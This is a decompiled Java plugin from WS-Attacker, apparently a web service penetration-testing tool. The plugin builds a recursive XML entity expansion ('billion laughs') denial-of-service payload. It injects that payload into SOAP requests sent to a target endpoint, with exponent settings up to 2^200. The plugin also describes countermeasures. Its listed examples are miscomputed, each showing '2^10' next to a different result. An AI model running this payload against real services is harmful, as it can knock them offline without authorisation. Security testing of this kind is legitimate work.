/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.plugin.dos;

import java.util.HashMap;
import java.util.Map;
import wsattacker.main.composition.plugin.option.AbstractOption;
import wsattacker.main.composition.plugin.option.AbstractOptionInteger;
import wsattacker.main.plugin.option.OptionLimitedInteger;
import wsattacker.plugin.dos.dosExtension.abstractPlugin.AbstractDosPlugin;
import wsattacker.plugin.dos.dosExtension.option.OptionTextAreaSoapMessage;

public class XmlEntityExpansion
extends AbstractDosPlugin {
    private static final long serialVersionUID = 1L;
    private AbstractOptionInteger optionExponent;

    @Override
    public void initializeDosPlugin() {
        this.initData();
        this.optionExponent = new OptionLimitedInteger("Number of entities (power of 2)", 20, "Exponent for calculating the number of entities (total entities = 2^Param8)", 1, 200);
        this.getPluginOptions().add((AbstractOption)this.optionExponent);
    }

    public AbstractOptionInteger getOptionNumberOfEntities() {
        return this.optionExponent;
    }

    @Override
    public OptionTextAreaSoapMessage.PayloadPosition getPayloadPosition() {
        return OptionTextAreaSoapMessage.PayloadPosition.BODYLASTCHILDELEMENT;
    }

    public void initData() {
        this.setName("XML Entity Expansion (recursive)");
        this.setDescription("<html><p>This attack checks whether or not a Web service is vulnerable to the \"XML Entity Expansion\" attack.</p><p>A vulnerable Web service runs out of resources when trying to resolve a large amount of recursively defined entities.The entities are defined in the Document Type Definition (DTD). A detailed description of the attack can be found on <a href=\"http://clawslab.nds.rub.de/wiki/index.php/XML_Remote_Entity_Expansion\">http://clawslab.nds.rub.de/wiki/index.php/XML_Remote_Entity_Expansion</a></p><p>The attack algorithm replaces the string $$PAYLOADATTR$$ in the SOAP message below with an attribute that uses an entity that will start the recursive process. The placeholder $$PAYLOADATTR$$ can be set to any other position in the SOAP message.</p><p>The number of entitites defines the exponent that is used for calculating the number of resulting XML entities. The base is 2.<ul><li>Input 10 will result in  2^10 = 1024 entities.</li><li>Input 15 will result in  2^10 = 32768 entities.</li><li>Input 20 will result in  2^10 = 1048576 entities.</li><li>Input 25 will result in  2^10 = 33554432 entities</li></ul></p></html>");
        this.setCountermeasures("In order to counter the attack, the DTD-processing (Document Type Definitions) feature has to be disabled completly.\nApache Axis2 1.5.2 is known to be vulnerable to this attack. Current versions of Apache Axis2 are not vulnerable anymore");
    }

    @Override
    public void createTamperedRequest() {
        String soapMessage = this.getOptionTextAreaSoapMessage().getValue();
        StringBuilder sb = new StringBuilder();
        sb.append("<?xml version=\"1.0\" encoding=\"UTF-8\"?>");
        sb.append("<!DOCTYPE ");
        sb.append("Envelope [");
        sb.append("<!ENTITY x0 \"Fo\">");
        int value = this.optionExponent.getValue();
        for (int element = 1; element < value; ++element) {
            sb.append("<!ENTITY x" + element + " \"&x" + (element - 1) + ";&x" + (element - 1) + ";\">");
        }
        sb.append("]");
        sb.append(">");
        sb.append(this.getOptionTextAreaSoapMessage().getValue());
        soapMessage = sb.toString();
        String soapMessageFinal = this.getOptionTextAreaSoapMessage().replacePlaceholderWithPayload(soapMessage, "<s>&x" + (value - 1) + ";</s>");
        HashMap<String, String> httpHeaderMap = new HashMap<String, String>();
        for (Map.Entry<String, String> entry : this.getOriginalRequestHeaderFields().entrySet()) {
            httpHeaderMap.put(entry.getKey(), entry.getValue());
        }
        httpHeaderMap.put("Content-Type", "application/xml; charset=UTF-8");
        this.setTamperedRequestObject(httpHeaderMap, this.getOriginalRequest().getEndpoint(), soapMessageFinal);
    }
}

